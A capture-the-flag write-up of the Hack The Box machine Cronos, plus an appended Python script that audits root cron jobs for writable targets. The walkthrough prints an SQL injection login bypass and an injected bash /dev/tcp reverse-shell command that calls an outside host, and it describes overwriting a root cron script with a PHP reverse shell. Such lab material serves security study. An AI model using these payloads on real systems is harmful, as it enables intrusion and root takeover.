HTB - Cronos

In Cronos we get exposed to some new and some old! Some DNS enumeration followed by SQLi with a bit of OS command execution will get us on the box. For privesc, we abuse a particular cron job.

First, our scan:

22,53,80!

DNS enumeration:

The first step is to resolve the IPs of Cronos using nslookup:

Any time we see DNS running on TCP, we should try for a zone transfer:

Perfect! Let's add these names to our /etc/hosts file:

Next step: visiting cronos.htb

Nothing much going on here, so I’ll pivot over to admin.cronos.htb

After many trivial and useless attempts to crack this, I finally found a SQLi that worked:

' or 1=1-- -

Absolutely brutal, but a reminder to run through the gamut before you call it quits!

Now, depending on what is happening here, I think we can issue some OS commands by chaining commands, and if we can, reverse shell!

Even easier than that, I realized I could intercept the request and place my own command!

command=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/443+0>%261'%26&host=8.8.8.8

and we got a shell!

Grab the user flag and your PrivEsc tool, I used LinEnum.sh here.

It leads us to a cron job and I notice I have write permissions to the file that’s being run.

I went into my php reverse shell toolkit and grabbed my reverse shell. Copied it onto artisan and waited:

Grab the flag and all set!
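
The privesc above works because a cron job running as root executes a file that a low-privileged user can modify. The following audit is an added example, not part of the original writeup: it parses system-crontab lines and flags any file run as root when the file or its parent directory is not owned by the trusted uid or is group/world-writable. The crontab line and temp-dir paths are constructed, and the current uid stands in for root so the demo runs unprivileged.

```python
import os
import shlex
import stat
import tempfile

def risky_cron_targets(crontab_text, trusted_uid=0):
    """Return (path, reason) pairs for files a root cron entry runs that
    someone other than trusted_uid could modify or replace."""
    findings = []
    for line in crontab_text.splitlines():
        # System crontab format: five time fields, user, command.
        fields = line.split(None, 6)
        if line.lstrip().startswith("#") or len(fields) < 7 or fields[5] != "root":
            continue
        try:
            tokens = shlex.split(fields[6])
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = fields[6].split()
        for token in tokens:
            if not (token.startswith("/") and os.path.isfile(token)):
                continue
            # A writable parent directory allows the file to be swapped out,
            # so check the directory as well as the file itself.
            for target in (token, os.path.dirname(token)):
                st = os.stat(target)
                if st.st_uid != trusted_uid:
                    findings.append((token, f"{target} is owned by uid {st.st_uid}"))
                elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                    findings.append((token, f"{target} is group/world-writable"))
    return findings

def demo():
    """Constructed sample: one root cron entry pointing at a temp-dir script."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "artisan")
    with open(script, "w") as fh:
        fh.write("<?php // placeholder\n")
    crontab = f"# constructed sample\n* * * * * root php {script} >> /dev/null 2>&1\n"
    me = os.getuid()  # stands in for root so the demo runs unprivileged
    os.chmod(script, 0o644)
    clean = risky_cron_targets(crontab, trusted_uid=me)
    os.chmod(script, 0o666)
    loose_mode = risky_cron_targets(crontab, trusted_uid=me)
    wrong_owner = risky_cron_targets(crontab, trusted_uid=me + 1)
    return clean, loose_mode, wrong_owner

if __name__ == "__main__":
    print(demo())
```

On a real host, pass the contents of /etc/crontab and the files under /etc/cron.d with the default `trusted_uid=0`; per-user crontabs have no user field and are not handled here.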